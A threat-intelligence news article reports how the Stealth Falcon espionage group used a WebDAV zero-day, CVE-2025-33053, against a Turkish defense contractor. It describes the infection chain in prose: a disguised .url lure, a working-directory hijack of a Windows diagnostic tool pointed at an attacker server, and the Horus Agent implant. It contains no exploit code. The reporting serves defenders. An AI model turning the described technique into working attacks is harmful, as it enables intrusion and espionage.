A sophisticated cyberattack campaign has emerged from the advanced persistent threat group known as Stealth Falcon, which recently exploited a previously unknown zero-day vulnerability to target a prominent Turkish defense company. This attack involved the remote execution of malware, showcasing the group’s technical prowess and strategic planning.
The vulnerability in question, identified as CVE-2025-33053, allows threat actors to manipulate the working directory of legitimate Windows tools, enabling them to execute malicious files from attacker-controlled WebDAV servers. Microsoft responded to this security risk by releasing a patch during its June Patch Tuesday updates, following a responsible disclosure by Check Point Research.
The attack was initiated through a malicious .url file, cleverly named “TLM.005TELESKOPIKMASTHASARBILDIRIM_RAPORU.pdf.url,” which translates to “TLM.005 TELESCOPIC MAST DAMAGE REPORT.pdf.url” in Turkish. This file was likely distributed as an archived attachment in a spear-phishing email aimed at the Turkish defense contractor.
Upon execution, the .url file directed the system to iediagcmd.exe, a legitimate Internet Explorer diagnostics utility. However, the attackers manipulated the working directory to reference their own WebDAV server at “summerartcamp[.]net@ssl@443/DavWWWRootOSYxaOjr.” This technique exploited the search order utilized by the .NET Process.Start() method, causing the legitimate tool to execute malicious files from the remote server rather than the intended system files.
This clever maneuver facilitated arbitrary code execution via process hollowing, allowing the malicious route.exe spawned from the WebDAV server to bypass traditional signature-based defenses.
APT Hackers Exploited WebDAV Zero-Day
Stealth Falcon, also recognized as FruityArmor, has been engaged in cyber espionage operations since at least 2012, primarily targeting high-profile entities across the Middle East and Africa. Recent activities have been noted against government and defense sectors in Turkey, Qatar, Egypt, and Yemen.
The attack unfolded through a multi-stage infection chain, culminating in the deployment of “Horus Agent,” a custom-built implant designed for the Mythic command and control framework. Named after the Egyptian falcon-headed sky god, Horus Agent signifies an evolution from the group’s previously utilized Apollo implant. This malware employs advanced anti-analysis techniques, including code virtualization, string encryption, and API hashing, to evade detection.
Beyond the initial implant, researchers uncovered several previously undisclosed custom tools within Stealth Falcon’s arsenal. These include a DC Credential Dumper that bypasses file locks by accessing virtual disk copies, a passive backdoor that listens for incoming shellcode execution requests, and a custom keylogger utilizing RC4 encryption.
The Horus Agent is designed to perform essential reconnaissance functions, enabling threat actors to fingerprint victim machines and evaluate their value before deploying more advanced payloads. This method serves to protect the group’s sophisticated post-exploitation tools from exposure.
Stealth Falcon consistently employs repurposed legitimate domains acquired through the NameCheap registrar, typically in .net or .com top-level domains. This strategy allows their infrastructure to blend seamlessly with legitimate traffic, complicating attribution efforts.
The group’s ongoing evolution underscores its commitment to maintaining stealth and resilience in its operations. By utilizing commercial code obfuscation tools and custom modifications, they ensure that their payloads remain challenging to reverse-engineer and track over time.
This latest campaign serves as a stark reminder of the persistent threat posed by sophisticated APT groups, which adeptly combine zero-day exploits with innovative attack vectors, such as WebDAV manipulation, to target critical infrastructure and defense organizations worldwide.
Automate threat response with ANY.RUN’s TI Feeds—Enrich alerts and block malicious IPs across all endpoints -> Request full access
